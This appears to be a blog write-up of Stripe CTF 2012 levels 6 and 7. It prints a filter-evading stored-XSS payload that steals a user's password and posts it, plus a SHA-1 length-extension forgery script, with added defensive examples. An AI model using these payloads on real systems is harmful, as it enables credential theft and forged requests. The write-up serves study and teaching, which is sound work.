    &lt;h3&gt;Login&lt;/h3&gt;

    &lt;br /&gt;

    &lt;p&gt;
      Sign into your Streamer account, and instantly start sharing updates
      with your friends. If you don't have an account yet,
      &lt;a href='&lt;%= absolute_url ("/register") %&gt;'&gt;create one now&lt;/a&gt;!
    &lt;/p&gt;

    &lt;br /&gt;

    &lt;form class='form-inline' action='&lt;%= absolute_url("/login") %&gt;'
          method='post'&gt;
      &lt;%= csrf_tag %&gt;
      &lt;input class='input-medium' name='username' type='text'
             placeholder='Username'/&gt;
      &lt;input class='input-medium' name='password' type='password'
             placeholder='Password'/&gt;
      &lt;input class='btn btn-primary' type='submit' value='Sign In'/&gt;
    &lt;/form&gt;
  &lt;/div&gt;
&lt;/div&gt;</pre>
</td>
</tr>
</tbody>
</table>
The contents of <code>views/register.erb</code>:
<table>
<tbody>
<tr>
<td>
<pre>&lt;div class='row'&gt;
  &lt;div class='span12'&gt;
    &lt;h3&gt;Register for a Streamer account&lt;/h3&gt;

    &lt;br /&gt;

    &lt;form class='form-horizontal' action='&lt;%= absolute_url("/register") %&gt;'
          method='post'&gt;
      &lt;%= csrf_tag %&gt;
      &lt;fieldset&gt;
        &lt;div class='control-group'&gt;
          &lt;label class='control-label' for='username'&gt;Username:&lt;/label&gt;
          &lt;div class='controls'&gt;
            &lt;input class='input-medium' name='username' id='username'
                   type='text' placeholder='Username'/&gt;
          &lt;/div&gt;
        &lt;/div&gt;
        &lt;div class='control-group'&gt;
          &lt;label class='control-label' for='username'&gt;Password:&lt;/label&gt;
          &lt;div class='controls'&gt;
            &lt;input class='input-medium' name='password' id='password'
                   type='password' placeholder='Password'/&gt;
          &lt;/div&gt;
        &lt;/div&gt;
        &lt;div class='form-actions'&gt;
          &lt;input class='btn btn-primary' type='submit' value='Register'/&gt;
        &lt;/div&gt;
      &lt;/fieldset&gt;
    &lt;/form&gt;
  &lt;/div&gt;
&lt;/div&gt;</pre>
</td>
</tr>
</tbody>
</table>
The contents of <code>views/layout.erb</code>:
<table>
<tbody>
<tr>
<td>
<pre>&lt;!doctype html&gt;
&lt;html&gt;
  &lt;head&gt;
    &lt;title&gt;Streamer&lt;/title&gt;
    &lt;script src='&lt;%= absolute_url('/js/jquery-1.8.0.min.js') %&gt;'&gt;&lt;/script&gt;
    &lt;link rel='stylesheet' type='text/css'
          href='&lt;%= absolute_url('/css/bootstrap-combined.min.css') %&gt;' /&gt;
  &lt;/head&gt;
  &lt;body&gt;
    &lt;div class='navbar'&gt;
      &lt;div class='navbar-inner'&gt;
        &lt;div class='container'&gt;
          &lt;a class='brand' href='&lt;%= absolute_url("/") %&gt;'&gt;Streamer&lt;/a&gt;
          &lt;% if @user %&gt;
            &lt;ul class='nav pull-right'&gt;
              &lt;li&gt;&lt;a href='&lt;%= absolute_url("/logout") %&gt;'&gt;Log Out&lt;/a&gt;&lt;/li&gt;
            &lt;/ul&gt;
          &lt;% end %&gt;
        &lt;/div&gt;
      &lt;/div&gt;
    &lt;/div&gt;
    &lt;div class='container'&gt;
&lt;% if @error %&gt;
  &lt;p&gt;Error: &lt;%= @error %&gt;&lt;/p&gt;
&lt;% end %&gt;
&lt;% if @success %&gt;
  &lt;p&gt;Success: &lt;%= @success %&gt;&lt;/p&gt;
&lt;% end %&gt;

      &lt;%= yield %&gt;
    &lt;/div&gt;
  &lt;/body&gt;
&lt;/html&gt;</pre>
</td>
</tr>
</tbody>
</table>
The contents of <code>views/user_info.erb</code>:
<table>
<tbody>
<tr>
<td>
<pre>&lt;div class='row'&gt;
  &lt;div class='span12'&gt;
    &lt;h3&gt;User Information&lt;/h3&gt;
    &lt;table class='table table-condensed'&gt;
      &lt;tr&gt;
        &lt;th&gt;Username:&lt;/th&gt;
        &lt;td&gt;&lt;%= @username %&gt;&lt;/td&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;th&gt;Password:&lt;/th&gt;
        &lt;td&gt;&lt;%= @password %&gt;&lt;/td&gt;
      &lt;/tr&gt;
    &lt;/table&gt;
  &lt;/div&gt;
&lt;/div&gt;</pre>
</td>
</tr>
</tbody>
</table>
</div>
<strong>Solution</strong>

This one is pretty nasty. It requires a carefully encoded XSS payload to bypass several input checks, of the kind found here and there in Google and Facebook.

This app is something like Twitter: a bunch of users are registered, and everyone can post something. Posts consist of a title and a body. The posting mechanism uses AJAX to make things a little harder.
<div><a href="http://abiusx.com/blog/wp-content/uploads/2012/08/stripe-ctf-challenge6.png"><img class="aligncenter size-medium wp-image-773" title="stripe-ctf-challenge6" src="http://abiusx.com/blog/wp-content/uploads/2012/08/stripe-ctf-challenge6-300x168.png" alt="" width="300" height="168" /></a></div>
There is no reset password feature, but if you click on your username in the right sidebar, another page pops up showing you your password:
<div><a href="http://abiusx.com/blog/wp-content/uploads/2012/08/stripe-ctf-challenge6-password.png"><img class="aligncenter size-full wp-image-774" title="stripe-ctf-challenge6-password" src="http://abiusx.com/blog/wp-content/uploads/2012/08/stripe-ctf-challenge6-password.png" alt="" width="486" height="159" /></a></div>
So our JavaScript snippet would first have to open this page (https://level06-2.stripe-ctf.com/user-nmqpuylekv/user_info) and then use a regex to extract the password from it. The challenge states that the password contains special characters such as quotation marks and apostrophes.

Then the snippet would have to post this password as a message body via AJAX so that other users (including us) could see it. Since the posting mechanism rejects any message containing quotation marks or apostrophes, the snippet has to escape those characters first and then submit.

Also, because of that rejection mechanism, the snippet itself could not contain quotation marks or apostrophes (which are very common in every programming language), or it would never be accepted and run by other users.

To make things worse, the messages are not rendered into the page directly by Ruby. Instead they are stored as JSON inside a JavaScript snippet, then read out one by one by another JavaScript snippet and added to the page, so whatever we inject lands in the middle of some JavaScript code:
<blockquote><pre>var username = "abx";

var post_data = [{"time":"Fri Aug 24 12:25:13 +0000 2012","title":"Might want to take note","user":"level07-password-holder","id":null,"body":"Anyone want to play tennis?"},{"time":"Fri Aug 24 12:27:34 +0000 2012","title":"FYI","user":"level07-password-holder","id":null,"body":"Why is it so hard to find good juice restaurants?"},{"time":"Fri Aug 24 13:17:37 +0000 2012","title":"Definitely of interest","user":"level07-password-holder","id":null,"body":"Anyone want to play tennis?"},{"time":"Fri Aug 24 13:21:23 +0000 2012","title":"An FYI","user":"level07-password-holder","id":null,"body":"I am hungry"},{"time":"Sun Aug 26 01:24:24 +0000 2012","title":"SAMPLE TITLE","user":"abx","id":null,"body":"SAMPLE BODY"}];

function escapeHTML(val) {
  return $('&lt;div/&gt;').text(val).html();
}

function addPost(item) {
  var new_element = '&lt;tr&gt;&lt;th&gt;' + escapeHTML(item['user']) +
    '&lt;/th&gt;&lt;td&gt;&lt;h4&gt;' + escapeHTML(item['title']) + '&lt;/h4&gt;' +
    escapeHTML(item['body']) + '&lt;/td&gt;&lt;/tr&gt;';
  $('#posts &gt; tbody:last').prepend(new_element);
}

for(var i = 0; i &lt; post_data.length; i++) {
  var item = post_data[i];
  addPost(item);
}</pre></blockquote>
Whatever we enter goes where you can see <strong>SAMPLE BODY</strong> now. I crafted the following snippet to do the dirty XSS job for me:
<blockquote><pre>&lt;/script&gt;
&lt;script&gt;
var temp=new String();
var ajax_uri=String.fromCharCode(46, 47, 117, 115, 101, 114, 95, 105, 110, 102, 111);
var content_tag=String.fromCharCode(35, 99, 111, 110, 116, 101, 110, 116);
var title_tag=String.fromCharCode(35, 116, 105, 116, 108, 101);
var submit_tag=String.fromCharCode(35, 110, 101, 119, 95, 112, 111, 115, 116);
$.get(ajax_uri,function(data){
  temp=data.match(/&lt;td&gt;([^al].*)&lt;/)[1];
  temp=temp.replace(String.fromCharCode(39),String.fromCharCode(66, 79, 90));
  temp=temp.replace(String.fromCharCode(34),String.fromCharCode(66,79,89));
  $(content_tag).val(temp);
  $(title_tag).val(title_tag);
  $(submit_tag).submit();
});
//</pre></blockquote>
This one is also a one-liner but has been split up for readability here. Now let me explain this XSS. First we have temp, in which we are going to store the password. Then we have four variables containing the strings "./user_info", "#content", "#title" and "#new_post". We had to populate them using fromCharCode so as not to use quotation marks in our code, which would otherwise be rejected.

The next line performs an AJAX GET request to the <strong>user_info</strong> page, which contains the user's password. The regular expression extracts the password part. Unfortunately we could not use a backslash (\) in our snippet either, because Ruby escapes it automatically, so multi-line regular expressions were out. This one captures the password plus the rest of its line, but to the human eye the password is obvious.

Then we replace the apostrophe with the string BOZ and the quotation mark with the string BOY so that the password can be posted as a message. Then the form is filled in using jQuery and submitted so that the post appears.

We needed the first and last lines because we are injecting into the middle of a JavaScript string. Fortunately, browsers parse the HTML first and only then parse the JavaScript, so the document ends up looking like this:
<blockquote><strong>&lt;script&gt;</strong>var post_data = [{"time":"Fri Aug 24 12:25:13 +0000 2012","title":"Might want to take note","user":"level07-password-holder","id":null,"body":"Anyone want to play tennis?"},{"time":"Fri Aug 24 12:27:34 +0000 2012","title":"FYI","user":"level07-password-holder","id":null,"body":"Why is it so hard to find good juice restaurants?"},{"time":"Fri Aug 24 13:17:37 +0000 2012","title":"Definitely of interest","user":"level07-password-holder","id":null,"body":"Anyone want to play tennis?"},{"time":"Fri Aug 24 13:21:23 +0000 2012","title":"An FYI","user":"level07-password-holder","id":null,"body":"I am hungry"},{"time":"Sun Aug 26 01:24:24 +0000 2012","title":"SAMPLE TITLE","user":"abx","id":null,"body":"<strong>&lt;/script&gt;&lt;script&gt;var temp=new String();var ajax_uri=String.fromCharCode(46, 47, 117, 115, 101, 114, 95, 105, 110, 102, 111);var content_tag=String.fromCharCode(35, 99, 111, 110, 116, 101, 110, 116);var title_tag=String.fromCharCode(35, 116, 105, 116, 108, 101);var submit_tag=String.fromCharCode(35, 110, 101, 119, 95, 112, 111, 115, 116);$.get(ajax_uri,function(data){temp=data.match(/&lt;td&gt;([^al].*)&lt;/)[1];temp=temp.replace(String.fromCharCode(39),String.fromCharCode(66, 79, 90));temp=temp.replace(String.fromCharCode(34),String.fromCharCode(66,79,89));$(content_tag).val(temp);$(title_tag).val(title_tag);$(submit_tag).submit();}); //</strong>"}]; &lt;/script&gt;</blockquote>
First the HTML is parsed, which turns this into two separate script elements; then the JavaScript parser starts, finds the first part broken and unparsable, but runs the second part, which is valid. The // (comment symbol) at the end of our snippet masks the rest of the JavaScript so that the second script has valid syntax.
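The break-out works because the app serializes the posts straight into a &lt;script&gt; element, and the HTML parser ends that element at the first &lt;/script it meets, before any JavaScript runs; the app's escapeHTML only protects the later DOM insertion, not this embedding. The following is an added example, not code from the page or from the Streamer app (which is Ruby; the example is Python for illustration). It shows the naive embedding beside the encoding that prevents the break-out; the function names and the sample posts are constructed for this illustration:

```python
import json
import re

# Constructed sample posts in the shape of the page's post_data array. The last
# body is the kind of value the page shows being injected: it closes the
# surrounding <script> element from inside a JSON string.
SAMPLE_POSTS = [
    {"time": "Fri Aug 24 12:25:13 +0000 2012", "title": "FYI",
     "user": "level07-password-holder", "id": None, "body": "I am hungry"},
    {"time": "Sun Aug 26 01:24:24 +0000 2012", "title": "SAMPLE TITLE",
     "user": "abx", "id": None,
     "body": "</script><script>/* constructed marker */</script>"},
]

SCRIPT_OPEN = "<script>var post_data = "
SCRIPT_CLOSE = ";</script>"


def naive_script_json(posts):
    """What the page's app does: json.dumps output dropped into a <script>.
    json.dumps leaves '<', '>' and '&' untouched, so a body containing
    </script> ends the element in the HTML parser before any JS runs."""
    return SCRIPT_OPEN + json.dumps(posts) + SCRIPT_CLOSE


# Characters the HTML parser acts on, mapped to JSON \uXXXX escapes.
_SCRIPT_ESCAPES = {"<": "\\u003c", ">": "\\u003e", "&": "\\u0026"}


def json_for_script(value):
    """JSON that can sit inside a <script> element. The characters the HTML
    parser cares about are replaced by their \\uXXXX escapes, which is still
    valid JSON, so JSON.parse (or a JS literal) yields the very same data."""
    text = json.dumps(value, ensure_ascii=True)
    return "".join(_SCRIPT_ESCAPES.get(ch, ch) for ch in text)


def safe_script_json(posts):
    """The hardened embedding: same template, context-aware encoding."""
    return SCRIPT_OPEN + json_for_script(posts) + SCRIPT_CLOSE


_END_TAG = re.compile(r"</script", re.IGNORECASE)


def script_breaks_out(html):
    """True if the embedded data would close the script element early. The
    HTML parser ends a script element at '</script' in any letter case, so
    the search is case-insensitive; the real closing tag is excluded."""
    inner = html[len(SCRIPT_OPEN):-len(SCRIPT_CLOSE)]
    return _END_TAG.search(inner) is not None


def demo_script_embedding():
    """Compare both embeddings and confirm the safe one decodes unchanged."""
    naive = naive_script_json(SAMPLE_POSTS)
    safe = safe_script_json(SAMPLE_POSTS)
    decoded = json.loads(safe[len(SCRIPT_OPEN):-len(SCRIPT_CLOSE)])
    return {
        "naive_breaks_out": script_breaks_out(naive),
        "safe_breaks_out": script_breaks_out(safe),
        "safe_round_trips": decoded == SAMPLE_POSTS,
    }


if __name__ == "__main__":
    print(demo_script_embedding())
```

The page's input filter is the other half of the lesson: the app refused posts containing quotation marks, yet the injection never needed any, because String.fromCharCode produces them at run time. Black-listing characters on input does not substitute for encoding at the point of insertion, where the context (here a JSON string inside a script element) decides which characters are dangerous.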

Now post this snippet, wait a couple of minutes, refresh the page, view the source and see this:
<blockquote>{"time":"Sun Aug 26 01:34:19 +0000 2012","title":"#title","user":"level07-password-holder","id":null,"body":"BOZUomQaKdVQhrIBOY"}</blockquote>
Enjoy the password!

<h3><strong>Challenge 7 &#8211; Cryptographic Hash Extension</strong></h3>
You completed this level in 4968.437 seconds. The password was <code>ehQUKKkphF</code>.

The solution you submitted was:

<pre>import requests
import hashlib
import json
import sys
import urllib
body="count=10&amp;lat=37.351&amp;user_id=1&amp;long=-119.827&amp;waffle=eggo\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02(&amp;waffle=liege|sig:5fe73d0cbd3b4e82f9b87970041851d232e757cd"
resp= requests.post("https://level07-2.stripe-ctf.com/user-cyusirmzyz/orders",data=body)
print resp.text
# fAk u for this hard one</pre>

<hr />

Welcome to the penultimate level, Level 7.

WaffleCopter is a new service delivering locally-sourced organic waffles hot off of vintage waffle irons straight to your location using quad-rotor GPS-enabled helicopters. The service is modeled after <a href="http://tacocopter.com/">TacoCopter</a>, an innovative and highly successful early contender in the airborne food delivery industry. WaffleCopter is currently being tested in private beta in select locations.

Your goal is to order one of the decadent Liège Waffles, offered only to WaffleCopter&#8217;s first premium subscribers.

Log in to your account at <strong><a href="https://level07-2.stripe-ctf.com/user-cyusirmzyz" target="_blank">https://level07-2.stripe-ctf.com/user-cyusirmzyz</a></strong> with username <code>ctf</code> and password <code>password</code>. You will find your API credentials after logging in. You can fetch the code for the level via <code>git clone https://level07-2.stripe-ctf.com/user-cyusirmzyz/level07-code</code>, or you can read it below. You may find the sample API client in <code>client.py</code> particularly helpful.

The contents of <code>client.py</code>:
<table>
<tbody>
<tr>
<td>
<pre>#!/usr/bin/env python
import hashlib
import json
import sys
import urllib

import requests

class ClientError(Exception):
    pass

class Client(object):
    def __init__(self, endpoint, user_id, api_secret):
        self.endpoint = endpoint
        self.user_id = user_id
        self.api_secret = api_secret

    def order(self, waffle_name, coords, count=1):
        """Order one or more waffles."""
        params = {'waffle': waffle_name, 'count': count,
                  'lat': coords[0], 'long': coords[1]}
        return self.api_call('/orders', params)

    def api_call(self, path, params, debug_response=False):
        """Make an API call with parameters to the specified path."""
        body = self._make_post(params)
        resp = requests.post(self.endpoint + path, data=body)

        # for debugging
        if debug_response:
            return resp

        # try to decode response as json
        data = None
        if resp.headers['content-type'] == 'application/json':
            try:
                data = json.loads(resp.text)
            except ValueError:
                pass
            else:
                # raise error message if any
                error = data.get('error')
                if error:
                    raise ClientError(error)

        # raise error on non-200 status codes
        resp.raise_for_status()

        # return response data decoded from JSON or just response body
        return data or resp.text

    def _make_post(self, params):
        params['user_id'] = self.user_id
        body = urllib.urlencode(params)

        sig = self._signature(body)
        body += '|sig:' + sig

        return body

    def _signature(self, message):
        h = hashlib.sha1()
        h.update(self.api_secret + message)
        return h.hexdigest()

if __name__ == '__main__':
    if len(sys.argv) != 7:
        print 'usage: client.py ENDPOINT USER_ID SECRET WAFFLE LAT LONG'
        sys.exit(1)

    c = Client(*sys.argv[1:4])
    print c.order(sys.argv[4], sys.argv[5:7])</pre>
</td>
</tr>
</tbody>
</table>
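client.py signs each request as sha1(api_secret + body), and the submitted solution above exploits exactly that: a SHA-1 digest is the hash's internal state after its last block, so knowing sig = sha1(secret || msg) and the secret's length is enough to keep hashing and sign msg || padding || anything. The following is an added example written for this page, not the level's code: it re-derives the glue bytes of the page's payload, shows the prefix-MAC check accepting the extended message, and shows HMAC, the standard fix, rejecting it. The function names are mine, sha1_hex is a plain SHA-1 that additionally accepts a starting state (which hashlib does not expose), and the secret is a constructed stand-in of the length the payload implies, since the level's real secret is not on the page:

```python
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF
SHA1_IV = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0)


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def sha1_padding(total_len):
    """Bytes SHA-1 appends to a message of total_len bytes: 0x80, zeros up to
    56 mod 64, then the message length in bits as a big-endian 64-bit int."""
    zeros = (56 - (total_len + 1) % 64) % 64
    return b"\x80" + b"\x00" * zeros + struct.pack(">Q", total_len * 8)


def sha1_hex(data, state=SHA1_IV, prior_len=0):
    """SHA-1 of data, starting from `state` as if `prior_len` bytes (a whole
    number of blocks) had already been compressed. With the defaults this is
    ordinary SHA-1; with a state unpacked from a digest it resumes a hash
    whose earlier input (the secret) we never saw."""
    assert prior_len % 64 == 0
    msg = data + sha1_padding(prior_len + len(data))
    h = list(state)
    for off in range(0, len(msg), 64):
        w = list(struct.unpack(">16I", msg[off:off + 64]))
        for i in range(16, 80):
            w.append(_rotl(w[i - 3] ^ w[i - 8] ^ w[i - 14] ^ w[i - 16], 1))
        a, b, c, d, e = h
        for i in range(80):
            if i < 20:
                f, k = (b & c) | (~b & d), 0x5A827999
            elif i < 40:
                f, k = b ^ c ^ d, 0x6ED9EBA1
            elif i < 60:
                f, k = (b & c) | (b & d) | (c & d), 0x8F1BBCDC
            else:
                f, k = b ^ c ^ d, 0xCA62C1D6
            a, b, c, d, e = ((_rotl(a, 5) + f + e + k + w[i]) & MASK32,
                             a, _rotl(b, 30), c, d)
        h = [(x + y) & MASK32 for x, y in zip(h, (a, b, c, d, e))]
    return "".join("%08x" % x for x in h)


def extend_signature(sig_hex, signed_msg, secret_len, suffix):
    """Length extension. Given sig = sha1(secret || signed_msg) and only the
    secret's length, return (msg2, sig2) with sig2 == sha1(secret || msg2) and
    msg2 = signed_msg || glue || suffix, where glue is the padding the
    original hash consumed internally."""
    state = struct.unpack(">5I", bytes.fromhex(sig_hex))
    glue = sha1_padding(secret_len + len(signed_msg))
    absorbed = secret_len + len(signed_msg) + len(glue)  # a multiple of 64
    return signed_msg + glue + suffix, sha1_hex(suffix, state, absorbed)


def verify_prefix_mac(secret, msg, sig_hex):
    """The level's scheme, as in client.py's _signature: sha1(secret + body)."""
    return hmac.compare_digest(hashlib.sha1(secret + msg).hexdigest(), sig_hex)


def verify_hmac(secret, msg, sig_hex):
    """The fix: HMAC-SHA1. The key enters on both sides of the message, so the
    digest is not an internal state anyone can resume from."""
    expected = hmac.new(secret, msg, hashlib.sha1).hexdigest()
    return hmac.compare_digest(expected, sig_hex)


# The 55-byte query string from the page's submitted solution. Its glue ends
# in 0x0228 = 552 bits = 69 bytes, so the real secret was 14 bytes long; the
# secret below is a constructed stand-in of that length, not the level's.
PAGE_MSG = b"count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo"
SUFFIX = b"&waffle=liege"
SECRET = b"constructed-14"


def demo_length_extension(secret=SECRET):
    """Reproduce the page's glue bytes and compare the two verifiers."""
    orig_sig = hashlib.sha1(secret + PAGE_MSG).hexdigest()  # what client.py sends
    msg2, sig2 = extend_signature(orig_sig, PAGE_MSG, len(secret), SUFFIX)
    page_glue = b"\x80" + b"\x00" * 56 + b"\x02("  # the bytes in the page's body
    return {
        "sha1_matches_hashlib": sha1_hex(b"abc") == hashlib.sha1(b"abc").hexdigest(),
        "glue_matches_page": msg2 == PAGE_MSG + page_glue + SUFFIX,
        "prefix_mac_accepts_forgery": verify_prefix_mac(secret, msg2, sig2),
        "hmac_accepts_forgery": verify_hmac(secret, msg2, sig2),
    }


if __name__ == "__main__":
    print(demo_length_extension())
```

The padding depends only on the total length hashed, which is why the page's payload can end its glue with 0x0228: that is 552 bits, or 69 bytes, and with a 55-byte query string it fixes the secret at 14 bytes. HMAC is immune because the outer digest is computed over the key and an inner digest, not over the raw message, so it is not a state an attacker can resume. On the server side, compare signatures with hmac.compare_digest, and, since the extended body carries two waffle= parameters, reject duplicate keys rather than letting the later value win.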
The contents of <code>wafflecopter.py</code>:
<table>
<tbody>
<tr>
<td title="double click to toggle">
<pre><a name="n1" href="https://stripe-ctf.com/levels/7#n1"></a>1
<a name="n2" href="https://stripe-ctf.com/levels/7#n2"></a>2
<a name="n3" href="https://stripe-ctf.com/levels/7#n3"></a>3
<a name="n4" href="https://stripe-ctf.com/levels/7#n4"></a>4
<a name="n5" href="https://stripe-ctf.com/levels/7#n5"></a>5
<a name="n6" href="https://stripe-ctf.com/levels/7#n6"></a>6
<a name="n7" href="https://stripe-ctf.com/levels/7#n7"></a>7
<a name="n8" href="https://stripe-ctf.com/levels/7#n8"></a>8
<a name="n9" href="https://stripe-ctf.com/levels/7#n9"></a>9
<strong><a name="n10" href="https://stripe-ctf.com/levels/7#n10"></a>10</strong>
<a name="n11" href="https://stripe-ctf.com/levels/7#n11"></a>11
<a name="n12" href="https://stripe-ctf.com/levels/7#n12"></a>12
<a name="n13" href="https://stripe-ctf.com/levels/7#n13"></a>13
<a name="n14" href="https://stripe-ctf.com/levels/7#n14"></a>14
<a name="n15" href="https://stripe-ctf.com/levels/7#n15"></a>15
<a name="n16" href="https://stripe-ctf.com/levels/7#n16"></a>16
<a name="n17" href="https://stripe-ctf.com/levels/7#n17"></a>17
<a name="n18" href="https://stripe-ctf.com/levels/7#n18"></a>18
<a name="n19" href="https://stripe-ctf.com/levels/7#n19"></a>19
<strong><a name="n20" href="https://stripe-ctf.com/levels/7#n20"></a>20</strong>
<a name="n21" href="https://stripe-ctf.com/levels/7#n21"></a>21
<a name="n22" href="https://stripe-ctf.com/levels/7#n22"></a>22
<a name="n23" href="https://stripe-ctf.com/levels/7#n23"></a>23
<a name="n24" href="https://stripe-ctf.com/levels/7#n24"></a>24
<a name="n25" href="https://stripe-ctf.com/levels/7#n25"></a>25
<a name="n26" href="https://stripe-ctf.com/levels/7#n26"></a>26
<a name="n27" href="https://stripe-ctf.com/levels/7#n27"></a>27
<a name="n28" href="https://stripe-ctf.com/levels/7#n28"></a>28
<a name="n29" href="https://stripe-ctf.com/levels/7#n29"></a>29
<strong><a name="n30" href="https://stripe-ctf.com/levels/7#n30"></a>30</strong>
<a name="n31" href="https://stripe-ctf.com/levels/7#n31"></a>31
<a name="n32" href="https://stripe-ctf.com/levels/7#n32"></a>32
<a name="n33" href="https://stripe-ctf.com/levels/7#n33"></a>33
<a name="n34" href="https://stripe-ctf.com/levels/7#n34"></a>34
<a name="n35" href="https://stripe-ctf.com/levels/7#n35"></a>35
<a name="n36" href="https://stripe-ctf.com/levels/7#n36"></a>36
<a name="n37" href="https://stripe-ctf.com/levels/7#n37"></a>37
<a name="n38" href="https://stripe-ctf.com/levels/7#n38"></a>38
<a name="n39" href="https://stripe-ctf.com/levels/7#n39"></a>39
<strong><a name="n40" href="https://stripe-ctf.com/levels/7#n40"></a>40</strong>
<a name="n41" href="https://stripe-ctf.com/levels/7#n41"></a>41
<a name="n42" href="https://stripe-ctf.com/levels/7#n42"></a>42
<a name="n43" href="https://stripe-ctf.com/levels/7#n43"></a>43
<a name="n44" href="https://stripe-ctf.com/levels/7#n44"></a>44
<a name="n45" href="https://stripe-ctf.com/levels/7#n45"></a>45
<a name="n46" href="https://stripe-ctf.com/levels/7#n46"></a>46
<a name="n47" href="https://stripe-ctf.com/levels/7#n47"></a>47
<a name="n48" href="https://stripe-ctf.com/levels/7#n48"></a>48
<a name="n49" href="https://stripe-ctf.com/levels/7#n49"></a>49
<strong><a name="n50" href="https://stripe-ctf.com/levels/7#n50"></a>50</strong>
<a name="n51" href="https://stripe-ctf.com/levels/7#n51"></a>51
<a name="n52" href="https://stripe-ctf.com/levels/7#n52"></a>52
<a name="n53" href="https://stripe-ctf.com/levels/7#n53"></a>53
<a name="n54" href="https://stripe-ctf.com/levels/7#n54"></a>54
<a name="n55" href="https://stripe-ctf.com/levels/7#n55"></a>55
<a name="n56" href="https://stripe-ctf.com/levels/7#n56"></a>56
<a name="n57" href="https://stripe-ctf.com/levels/7#n57"></a>57
<a name="n58" href="https://stripe-ctf.com/levels/7#n58"></a>58
<a name="n59" href="https://stripe-ctf.com/levels/7#n59"></a>59
<strong><a name="n60" href="https://stripe-ctf.com/levels/7#n60"></a>60</strong>
<a name="n61" href="https://stripe-ctf.com/levels/7#n61"></a>61
<a name="n62" href="https://stripe-ctf.com/levels/7#n62"></a>62
<a name="n63" href="https://stripe-ctf.com/levels/7#n63"></a>63
<a name="n64" href="https://stripe-ctf.com/levels/7#n64"></a>64
<a name="n65" href="https://stripe-ctf.com/levels/7#n65"></a>65
<a name="n66" href="https://stripe-ctf.com/levels/7#n66"></a>66
<a name="n67" href="https://stripe-ctf.com/levels/7#n67"></a>67
<a name="n68" href="https://stripe-ctf.com/levels/7#n68"></a>68
<a name="n69" href="https://stripe-ctf.com/levels/7#n69"></a>69
<strong><a name="n70" href="https://stripe-ctf.com/levels/7#n70"></a>70</strong>
<a name="n71" href="https://stripe-ctf.com/levels/7#n71"></a>71
<a name="n72" href="https://stripe-ctf.com/levels/7#n72"></a>72
<a name="n73" href="https://stripe-ctf.com/levels/7#n73"></a>73
<a name="n74" href="https://stripe-ctf.com/levels/7#n74"></a>74
<a name="n75" href="https://stripe-ctf.com/levels/7#n75"></a>75
<a name="n76" href="https://stripe-ctf.com/levels/7#n76"></a>76
<a name="n77" href="https://stripe-ctf.com/levels/7#n77"></a>77
<a name="n78" href="https://stripe-ctf.com/levels/7#n78"></a>78
<a name="n79" href="https://stripe-ctf.com/levels/7#n79"></a>79
<strong><a name="n80" href="https://stripe-ctf.com/levels/7#n80"></a>80</strong>
<a name="n81" href="https://stripe-ctf.com/levels/7#n81"></a>81
<a name="n82" href="https://stripe-ctf.com/levels/7#n82"></a>82
<a name="n83" href="https://stripe-ctf.com/levels/7#n83"></a>83
<a name="n84" href="https://stripe-ctf.com/levels/7#n84"></a>84
<a name="n85" href="https://stripe-ctf.com/levels/7#n85"></a>85
<a name="n86" href="https://stripe-ctf.com/levels/7#n86"></a>86
<a name="n87" href="https://stripe-ctf.com/levels/7#n87"></a>87
<a name="n88" href="https://stripe-ctf.com/levels/7#n88"></a>88
<a name="n89" href="https://stripe-ctf.com/levels/7#n89"></a>89
<strong><a name="n90" href="https://stripe-ctf.com/levels/7#n90"></a>90</strong>
<a name="n91" href="https://stripe-ctf.com/levels/7#n91"></a>91
<a name="n92" href="https://stripe-ctf.com/levels/7#n92"></a>92
<a name="n93" href="https://stripe-ctf.com/levels/7#n93"></a>93
<a name="n94" href="https://stripe-ctf.com/levels/7#n94"></a>94
<a name="n95" href="https://stripe-ctf.com/levels/7#n95"></a>95
<a name="n96" href="https://stripe-ctf.com/levels/7#n96"></a>96
<a name="n97" href="https://stripe-ctf.com/levels/7#n97"></a>97
<a name="n98" href="https://stripe-ctf.com/levels/7#n98"></a>98
<a name="n99" href="https://stripe-ctf.com/levels/7#n99"></a>99
<strong><a name="n100" href="https://stripe-ctf.com/levels/7#n100"></a>100</strong>
<a name="n101" href="https://stripe-ctf.com/levels/7#n101"></a>101
<a name="n102" href="https://stripe-ctf.com/levels/7#n102"></a>102
<a name="n103" href="https://stripe-ctf.com/levels/7#n103"></a>103
<a name="n104" href="https://stripe-ctf.com/levels/7#n104"></a>104
<a name="n105" href="https://stripe-ctf.com/levels/7#n105"></a>105
<a name="n106" href="https://stripe-ctf.com/levels/7#n106"></a>106
<a name="n107" href="https://stripe-ctf.com/levels/7#n107"></a>107
<a name="n108" href="https://stripe-ctf.com/levels/7#n108"></a>108
<a name="n109" href="https://stripe-ctf.com/levels/7#n109"></a>109
<strong><a name="n110" href="https://stripe-ctf.com/levels/7#n110"></a>110</strong>
<a name="n111" href="https://stripe-ctf.com/levels/7#n111"></a>111
<a name="n112" href="https://stripe-ctf.com/levels/7#n112"></a>112
<a name="n113" href="https://stripe-ctf.com/levels/7#n113"></a>113
<a name="n114" href="https://stripe-ctf.com/levels/7#n114"></a>114
<a name="n115" href="https://stripe-ctf.com/levels/7#n115"></a>115
<a name="n116" href="https://stripe-ctf.com/levels/7#n116"></a>116
<a name="n117" href="https://stripe-ctf.com/levels/7#n117"></a>117
<a name="n118" href="https://stripe-ctf.com/levels/7#n118"></a>118
<a name="n119" href="https://stripe-ctf.com/levels/7#n119"></a>119
<strong><a name="n120" href="https://stripe-ctf.com/levels/7#n120"></a>120</strong>
<a name="n121" href="https://stripe-ctf.com/levels/7#n121"></a>121
<a name="n122" href="https://stripe-ctf.com/levels/7#n122"></a>122
<a name="n123" href="https://stripe-ctf.com/levels/7#n123"></a>123
<a name="n124" href="https://stripe-ctf.com/levels/7#n124"></a>124
<a name="n125" href="https://stripe-ctf.com/levels/7#n125"></a>125
<a name="n126" href="https://stripe-ctf.com/levels/7#n126"></a>126
<a name="n127" href="https://stripe-ctf.com/levels/7#n127"></a>127
